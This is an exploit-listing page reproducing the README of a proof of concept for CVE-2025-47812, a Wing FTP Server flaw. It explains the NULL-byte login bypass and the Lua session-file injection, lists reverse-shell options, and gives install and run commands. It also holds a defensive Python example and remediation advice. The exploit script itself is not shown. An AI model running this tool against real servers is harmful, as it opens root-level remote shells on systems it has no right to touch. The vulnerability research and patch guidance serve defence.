Related vulnerability
Description
Exploit for CVE-2025-47812 with a custom pseudo shell and robust error handling.
Introduction
<div align="center">
**CVE-2025-47812: Improper input validation leading to remote code execution and full system compromise**
</div>
<div align="center">
[MIT License](https://github.com/pevinkumar10/CVE-2025-47812/blob/main/LICENSE)
</div>
## 📘 Introduction:
Julien Ahrens from RCE Security discovered a critical security vulnerability impacting WingFTP. Tracked as CVE-2025-47812, the vulnerability has a CVSS score of 10. Successful exploitation of the vulnerability may allow a remote unauthenticated attacker to execute arbitrary code, leading to complete system compromise.
Wing FTP Server is cross-platform, user-friendly, and secure FTP server software. It supports multiple file transfer protocols, such as FTP, FTPS, HTTP, HTTPS, and SFTP, allowing flexibility for client connections.
To research CVE-2025-47812, I deployed a Docker container running Wing FTP Server 7.4.3 on a Linux host. The container was configured to expose the web interface, and I enabled anonymous login for easier unauthenticated testing. Additionally, a test user account (`dev-test:test`) was created to simulate authenticated scenarios. This setup provided a safe and controlled environment to reproduce the vulnerability and validate exploit behavior.
## 🚨 Vulnerability Summary:
- CVE ID: CVE-2025-47812
- CVSS v3.1 Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
- Base Score: 10.0 (Critical)
- Affected Software: Wing FTP Server <= 7.4.3
- Impact: Remote code execution leading to full system compromise.
- Exploitation Prerequisites:
  - Anonymous login allowed, or valid user credentials
  - No sudo permissions required for the user
## 🧪 Exploit Description:
When a user attempts to log in, the server invokes c_CheckUser, which returns OK_CHECK_CONNECTION regardless of what follows a NULL byte in the username, as long as the string before the NULL byte matches an existing user. An attacker can therefore append a NULL byte and arbitrary extra data to a known username to bypass the password check. The server uses strlen() to determine the length of the supplied username, but strlen() stops counting at the first NULL terminator, so only the prefix is compared against the user database while the full, unsanitized value is retained.
The unsanitized username (including the injected NULL byte and the Lua payload that follows it) is written directly into session files as Lua code. These session files are .lua files that are executed when sessions are loaded. On Linux, Wing FTP Server runs as root; on Windows, it runs as SYSTEM. The injected Lua payload therefore runs with full privileges when the session is reloaded.
Note: this behaviour only occurs when the user has no password set or when valid credentials are supplied. If a password is set for the user, the server enforces strict password validation.
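To make the root cause concrete, the following added example (not the project's exploit code) models the strlen()-style truncation described above beside a hardened check that rejects control characters before any lookup, plus a small detection helper for login bodies. The user store, form field names and request bodies are constructed for illustration.

```python
"""Root cause of CVE-2025-47812 as described above, with the check a hardened
login handler should make. Added example, not the project's code; the user
store, field names and request bodies are constructed."""
from urllib.parse import parse_qs

# Constructed user store: username -> password. An empty password models an
# account with no password set, as with anonymous login.
USERS = {"anonymous": "", "dev-test": "test"}


def c_strlen_view(value: str) -> str:
    """Emulate strlen()-based handling: the C string ends at the first NUL,
    so everything after it is invisible to the comparison."""
    nul = value.find("\x00")
    return value if nul < 0 else value[:nul]


def check_user_vulnerable(username: str, password: str) -> bool:
    """Lookup that compares only the prefix before the NUL. The full value
    (prefix, NUL and trailing data) would still be written to the session
    file, which is what makes the truncation dangerous."""
    expected = USERS.get(c_strlen_view(username))
    return expected is not None and expected == password


def check_user_hardened(username: str, password: str) -> bool:
    """Reject control characters (NUL included) before any lookup, so an
    unsanitized value never reaches the user database or a session file."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in username):
        return False
    expected = USERS.get(username)
    return expected is not None and expected == password


def flag_login_body(body: str) -> list:
    """Detection helper for a WAF or log pipeline: decode a URL-encoded login
    body and report fields carrying an embedded NUL. Field names are
    constructed; adapt them to the product's actual login form."""
    findings = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if "\x00" in value:
                tail = value[value.index("\x00") + 1:]
                findings.append(f"{field}: embedded NUL, {len(tail)} trailing bytes")
    return findings


if __name__ == "__main__":
    body = "username=anonymous%00PAYLOAD&password="  # constructed request body
    print(check_user_vulnerable("anonymous\x00PAYLOAD", ""))  # True: check bypassed
    print(check_user_hardened("anonymous\x00PAYLOAD", ""))    # False: rejected
    print(flag_login_body(body))
```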
## ⚒️ Install:
### Options:
```
Options:
-t, --target Target Wing FTP Server URL (e.g., http://192.168.1.100)
-u, --username Username to authenticate (default: anonymous)
-p, --password Password to authenticate (default: empty)
-lh, --lhost Local host to listen for reverse shell (default: 127.0.0.1)
-lp, --lport Local port to listen for reverse shell (default: 31337)
-ns, --no-shell Do not spawn a temporary shell (if set, a listener must be started manually)
-v, --verbose Enable verbose/debug output
-h, --help Show this help message and exit
```
### Usage:
```bash
git clone https://github.com/pevinkumar10/CVE-2025-47812
cd CVE-2025-47812
pip3 install -r requirements.txt
```
### 🎯 Exploitation:
<p align="center">
<img src="src/unauth-rce.gif" alt="CVE-2025-47812" width="550">
<br>
<em>CVE-2025-47812 - Wing FTP Server Unauthenticated RCE</em>
</p>
<br>
<p align="center">
<img src="src/auth-rce.gif" alt="CVE-2025-47812" width="600">
<br>
<em>CVE-2025-47812 - Wing FTP Server authenticated RCE (dev-test:test)</em>
</p>
<p align="center">
<video src="src/auth-rce.mp4" width="650" controls></video>
</p>
Example usage:
```bash
python3 exploit.py --target http://172.17.0.2 --lhost 172.17.0.1 --lport 31336
```
## 🛡️ Remediation:
- Users must upgrade to WingFTP version 7.4.4 to patch the vulnerability.
- Please refer to the WingFTP Release [Notes](https://www.wftpserver.com/serverhistory.htm) for more information.
## 📜 Reference & Credit:
- Original Exploit Author: Sheikh Mohammad Hasan aka [4m3rr0r](https://github.com/4m3rr0r)
- [Qualys](https://threatprotect.qualys.com/2025/07/02/wingftp-critical-remote-code-execution-vulnerability-cve-2025-47812/)
- [Exploit](https://www.exploit-db.com/exploits/52347)
Note: I used the above references for research purposes and updated the exploit with more features and robust error handling.
## ⚖️ License:
This Python PoC is released under the [MIT](./LICENSE) License.
The original exploit concept and disclosure credit belong to the Stratascale Cyber Research Unit.
File snapshot
```
[4.0K] /data/pocs/e784151369860c7bb745bffeeb01a0d52cdc50ea
├── [9.3K] exploit.py
├── [1.0K] LICENSE
├── [5.1K] README.md
├── [   9] requirements.txt
└── [4.0K] src
    ├── [3.7M] auth-rce.gif
    ├── [  62] auth-rce.gif:Zone.Identifier
    ├── [4.9M] unauth-rce.gif
    └── [  62] unauth-rce.gif:Zone.Identifier

1 directory, 8 files
```
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.